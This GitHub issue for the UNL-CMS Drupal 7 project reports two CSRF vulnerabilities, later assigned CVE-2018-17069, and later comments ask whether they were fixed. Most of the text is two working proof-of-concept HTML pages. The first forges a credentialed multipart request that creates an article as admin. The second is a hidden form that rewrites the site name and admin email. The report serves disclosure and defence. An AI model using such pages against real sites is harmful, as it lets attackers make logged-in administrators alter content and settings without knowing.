search

unlcms / UNL-CMS

Drupal 7 implementation at the University of Nebraska–Lincoln
http://unlcms.unl.edu/
GNU General Public License v2.0
4 stars 13 forks source link

There are two CSRF vulnerabilities that can create new content or update the website settings #941

Closed hkzj closed 5 years ago

hkzj commented 5 years ago

1.There is a CSRF vulnerabilitie that can create new content via ?q=node%2Fadd%2Farticle&render=overlay&render=overlay • poc: one.html---create a new content

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.98.70\/test\/?q=node%2Fadd%2Farticle&render=overlay&render=overlay", true);
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarykSTT36TsD4Q4APj4");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"title\"\r\n" + 
          "\r\n" + 
          "test2\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"field_tags[und]\"\r\n" + 
          "\r\n" + 
          "test2\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"body[und][0][summary]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"body[und][0][value]\"\r\n" + 
          "\r\n" + 
          "test2\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"body[und][0][format]\"\r\n" + 
          "\r\n" + 
          "filtered_html\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"field_image[und][0][fid]\"\r\n" + 
          "\r\n" + 
          "0\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"field_image[und][0][display]\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"changed\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"form_build_id\"\r\n" + 
          "\r\n" + 
          "form-US-_ATkkU7RReGu6drEgOnBWNZYJm9XyETJkq_VShD4\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"form_token\"\r\n" + 
          "\r\n" + 
          "4RNenVCZF88dLm6Xs2zysuQK3co-ZDm3UFAEn9vuuog\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"form_id\"\r\n" + 
          "\r\n" + 
          "article_node_form\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"menu[link_title]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"menu[description]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"menu[parent]\"\r\n" + 
          "\r\n" + 
          "main-menu:0\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"menu[weight]\"\r\n" + 
          "\r\n" + 
          "0\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"log\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"path[alias]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"comment\"\r\n" + 
          "\r\n" + 
          "2\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"name\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"date\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"status\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"promote\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"additional_settings__active_tab\"\r\n" + 
          "\r\n" + 
          "edit-menu\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"op\"\r\n" + 
          "\r\n" + 
          "\xe4\xbf\x9d\xe5\xad\x98\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

2.There is a CSRF vulnerabilitie that can update the website settings via ?q=admin%2Fconfig%2Fsystem%2Fsite-information&render=overlay&render=overlay • poc: two.html---update the website settings

<<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.70/test/?q=admin%2Fconfig%2Fsystem%2Fsite-information&render=overlay&render=overlay" method="POST">
      <input type="hidden" name="site&#95;name" value="csrf" />
      <input type="hidden" name="site&#95;slogan" value="" />
      <input type="hidden" name="site&#95;mail" value="1225226617&#64;qq&#46;com" />
      <input type="hidden" name="default&#95;nodes&#95;main" value="10" />
      <input type="hidden" name="site&#95;frontpage" value="node" />
      <input type="hidden" name="site&#95;403" value="" />
      <input type="hidden" name="site&#95;404" value="" />
      <input type="hidden" name="form&#95;build&#95;id" value="form&#45;jKteM&#45;yz0FRNt&#45;BgQFbP7GMpveQAE1iAPh64RzWM5Wc" />
      <input type="hidden" name="form&#95;token" value="ZM4juQhCOlR4rr4PXtZrak2vHkOPIpesgR6lRwB8tg4" />
      <input type="hidden" name="form&#95;id" value="system&#95;site&#95;information&#95;settings" />
      <input type="hidden" name="op" value="ä&#191;&#157;å&#173;&#152;é&#133;&#141;ç&#189;&#174;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
NicoleG25 commented 4 years ago

Was this vulnerability ever addressed? Note that CVE-2018-17069 was assigned to this issue.

NicoleG25 commented 4 years ago

Was this vulnerability ever addressed? Note that CVE-2018-17069 was assigned to this issue.

@ericras